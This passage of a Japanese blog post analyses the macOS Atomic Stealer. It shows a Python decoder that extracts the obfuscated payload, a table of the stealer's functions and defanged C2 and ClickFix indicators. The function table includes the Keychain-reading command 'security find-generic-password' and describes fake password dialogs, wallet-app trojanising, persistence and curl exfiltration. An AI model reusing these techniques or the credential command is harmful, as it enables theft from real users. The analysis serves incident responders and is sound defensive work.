lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
(lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
(lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
]
for se, so, ae, ao in _forms:
result = _try_alt_form(raw, valid, se, so)
if not result:
continue
for ea, ec in result[0][:2]:
for od, oe in result[1][:2]:
out = bytearray()
ok = True
for i, b in enumerate(raw):
d = ae(b, ea, ec) if i % 2 == 0 else ao(b, od, oe)
if d not in valid:
ok = False
break
out.append(d)
if ok:
yield bytes(out)
def _payload_threshold(analyzed, key_entry):
"""Payload blobs are > 10% of the max size (excluding key)."""
max_sz = max(e['raw_size'] for e in analyzed if e is not key_entry)
return max_sz * 0.1
def find_small_blobs(analyzed, key_entry, final_key, hex_map):
"""Decode small non-key, non-payload blobs, trying all alternating forms
to find the one that produces the most readable output with the validated key."""
results = []
threshold = _payload_threshold(analyzed, key_entry)
valid = _valid_hex_set(hex_map)
for entry in analyzed:
if entry is key_entry:
continue
if entry['raw_size'] >= threshold:
continue
best_decoded, best_score = None, -1
# Try auto-detected algorithm first
if entry.get('decrypted'):
try:
hd = custom_hex_decode(entry['decrypted'], hex_map)
decoded = base64_decode(hd, final_key)
score = sum(1 for b in decoded if 32 <= b < 127 or b in (9, 10, 13))
if score > best_score:
best_score, best_decoded = score, decoded
except Exception:
pass
# Also re-try all 4 alternating forms on raw data with validated key
raw = entry.get('raw_data', b"")
if raw:
for dec_data in _all_alternating_decryptions(raw, valid):
try:
hd = custom_hex_decode(dec_data, hex_map)
decoded = base64_decode(hd, final_key)
score = sum(1 for b in decoded
if 32 <= b < 127 or b in (9, 10, 13))
if score > best_score:
best_score, best_decoded = score, decoded
except Exception:
pass
if best_decoded and best_score > 0:
results.append((entry, best_decoded))
return results
def find_payload_dynamic_xor(analyzed, key_entry, hex_map, final_key):
"""Find payload blobs and brute-force the dynamic XOR key for each."""
valid = _valid_hex_set(hex_map)
threshold = _payload_threshold(analyzed, key_entry)
payload_entries = [e for e in analyzed
if e['raw_size'] >= threshold and e is not key_entry]
if not payload_entries:
print("[WARN] No payload blobs found")
return
sizes_str = ', '.join(str(e['raw_size']) for e in payload_entries)
print(f"\n[INFO] {len(payload_entries)} payload blobs (sizes: {sizes_str})")
# For each payload blob, try all alternating forms to find hex-decodable output
valid = _valid_hex_set(hex_map)
payload_hexdec = []
for pe in payload_entries:
hd = None
# Try auto-detected first
if pe.get('decrypted'):
try:
hd = custom_hex_decode(pe['decrypted'], hex_map)
except Exception:
pass
# Also try all alternating forms on raw data
raw = pe.get('raw_data', b"")
if raw:
all_hds = [hd] if hd else []
for dec_data in _all_alternating_decryptions(raw, valid):
try:
all_hds.append(custom_hex_decode(dec_data, hex_map))
except Exception:
pass
# Also try non-alternating algorithms (already in pe['decrypted'])
if hd:
all_hds.insert(0, hd)
payload_hexdec.append(all_hds if all_hds else None)
elif hd:
payload_hexdec.append([hd])
else:
print(f" [SKIP] func 0x{pe['func_va']:x}: no valid decryption")
payload_hexdec.append(None)
# Brute-force: for each blob, find the XOR key that makes it valid hex chars
print(f"\n{'='*60}")
print(f"[Stage 4-9] 動的XOR鍵探索")
print(f"{'='*60}")
blob_xor_keys = []
blob_best_hd = [] # best hex-decoded data per blob
all_found = True
for i, hd_list in enumerate(payload_hexdec):
if hd_list is None:
all_found = False
blob_xor_keys.append(None)
blob_best_hd.append(None)
continue
found_key, found_hd = None, None
for hd in hd_list:
sample_head = hd[:2000]
sample_tail = hd[-2000:] if len(hd) > 4000 else b""
for k in range(256):
ok = all((b ^ k) in valid for b in sample_head)
if ok and sample_tail:
ok = all((b ^ k) in valid for b in sample_tail)
if ok:
found_key, found_hd = k, hd
break
if found_key is not None:
break
blob_xor_keys.append(found_key)
blob_best_hd.append(found_hd)
if found_key is not None:
print(f" Blob {i} (func 0x{payload_entries[i]['func_va']:x}): "
f"XOR key=0x{found_key:02x}")
else:
all_found = False
print(f" Blob {i}: no valid XOR key found")
if not all_found:
print(" [WARN] 一部blobのXOR鍵が見つかりません")
return
# Combine: XOR each blob, concatenate, hex_decode, base64_decode
try:
combined = bytearray()
for i, hd in enumerate(blob_best_hd):
k = blob_xor_keys[i]
combined.extend(b ^ k for b in hd)
combined = bytes(combined)
combined_dec = custom_hex_decode(combined, hex_map)
payload = base64_decode(combined_dec, final_key)
print(f"\n Payload size: {len(payload)} bytes")
with open("payload.sh", "wb") as f:
f.write(payload)
print(f" 保存: payload.sh")
print(payload[:300].decode('ascii', errors='replace'))
except Exception as e:
print(f" 結合復号失敗: {e}")
# =============================================================================
# Part 8: Main
# =============================================================================
def main():
mo = MachO(BINARY_PATH)
print(f"[INFO] バイナリ: {BINARY_PATH}")
print(f"[INFO] Slice offset: 0x{mo.slice_offset:x}, Entry: 0x{mo.entry_va:x}")
for key, sec in sorted(mo.sections.items(), key=lambda x: x[1]['addr']):
print(f" {key}: 0x{sec['addr']:x}-0x{sec['addr']+sec['size']:x} "
f"({sec['size']} bytes)")
# Step 1: Find hex table
hex_va, hex_map, alphabet = find_hex_table(mo)
print(f"\n[INFO] Hex table VA: 0x{hex_va:x}")
print(f"[INFO] Alphabet: {alphabet}")
# Step 2: Scan code
scan = scan_text_section(mo)
print(f"\n[INFO] Data refs: {len(scan['data_refs'])}, "
f"BL calls: {len(scan['bl_calls'])}")
# Step 3: Build pipeline
main_func, analyzed = build_pipeline(mo, scan, hex_map, hex_va)
if not analyzed:
print("[ERROR] No decrypt functions found")
return
# Step 4: Find XOR key
key_entry, final_key, post_xor = find_post_xor_and_key(analyzed, hex_map, mo)
# Step 5: Decode small blobs (initial command, env check)
small_blobs = find_small_blobs(analyzed, key_entry, final_key, hex_map)
for i, (entry, decoded) in enumerate(small_blobs):
label = "初期コマンド" if len(decoded) > 50 else "環境チェック"
print(f"\n[Stage {i+2}] {label} ({len(decoded)} bytes) "
f"[func 0x{entry['func_va']:x}]:")
print(decoded.decode('ascii', errors='replace'))
# Step 6: Payload blobs with dynamic XOR
find_payload_dynamic_xor(analyzed, key_entry, hex_map, final_key)
if __name__ == "__main__":
main()
我がNinja Agentくんが1晩でやってくれました。すごいですね。
osascript
デコードしたosascriptを解析していきます。
アンチVM機能
PythonデコーダをまたAIに作って貰いました。AI便利ですね。
こういったスクリプト系はAIだとほぼ解読してくれます。この部分はChat形式でも簡単に復号コードを提案してくれるので、例は記載しません。
ざっと難読化されてる文字列を復号してみます。

みたところ、アンチVMに使えそうな文字列ですね。

この判定によってexitコードを変化させていそうです。
メイン機能
次にメインとなるosascriptの内容を見ていきます。

色々見えましたが、ちょっと全機能まで見ていくのはしんどいのでAIに食わせて機能出力させました。
| 関数名 | デコード後の機能 | MITRE ATT&CK |
|---|---|---|
ngtywyvgam |
macOSパスワード窃取(偽ダイアログ "macOS wants to make changes") + Chrome Keychainパスワード取得 (security find-generic-password -ga 'Chrome') |
T1056, T1555.001 |
yztlutlwlsrt |
Chromiumブラウザデータ窃取 | T1539, T1005 |
kbxhhohc |
Firefoxデータ窃取 | T1539, T1005 |
fjitiugedax |
Safari Cookie + Apple Notes + Keychain + Desktop/Documentsファイル (txt,pdf,docx,wallet,key,kdbx,seed等、30MB制限) | T1005, T1213 |
fzubdcbu |
Apple Notes API経由の全ノート取得 → notes.html
|
T1213 |
eofbcgfnts |
Telegram Desktop | T1005 |
tqflqsxxym |
Ledger Live偽装: 正規アプリ削除 → C2からapp.zipダウンロード → インストール | T1565.001 |
xhvccfehowdd |
Trezor Suite偽装: 同上 | T1565.001 |
lxdpccylr |
Brave偽装: 同上 | T1565.001 |
jyfkoxepb |
LaunchDaemon永続化: plist作成 (com.apple.accountsd.helper) + sudo -S
|
T1543.001 |
aoecelrx |
C2データ送信: curl POST (チャンク分割対応) | T1041 |
wqunenpmgpvc |
Chrome拡張機能データ窃取 (250+の拡張ID、暗号ウォレット・パスワードマネージャ対象) | T1176 |
IOC
取り扱いには十分注意してください。
| 何の値か | IOC |
|---|---|
| ClickFix URL | hxxps[:]//chatgpt-codex[.]gitlab[.]io/cdx/? |
| ClickFix payload URL | hxxps[:]//cvols[.]com/curl/b952a8e1492d1d53fdcb794fd8d3d7a6b2a7ba0a6666a432d90cdca34de4d2b0 |
| helper download URL | hxxps[:]//cvols[.]com/jetbrains/update |
| C2 URL | hxxps[:]//atcoconst[.]com/contact |
| C2 IP | hxxp[:]//45[.]94[.]47[.]112/contact |
| ドメイン | szfried[.]com |
| helper hash | ffc4eb37a4b715525fc7bc8ca3c0b8efbc56cc4429407c07a4f686f9c19d249e |
| helper hash | edb8fd7de3a697af7f153390f22a6b16fc5821cabd4a74c84f49d9c4b66500fa |
まとめ
今回はAtomic Stealerの攻撃チェーンの解析(バイナリ解析メイン)を行いました。難読化されている機能やC2情報を復号して、マルウェアの挙動がある程度推測できるようになりました。
復号、解析の手順はここまでで説明できたと思うので、世のBlueTeamの方々のインシデント対応や脅威解析の手助けになれれば幸いです。

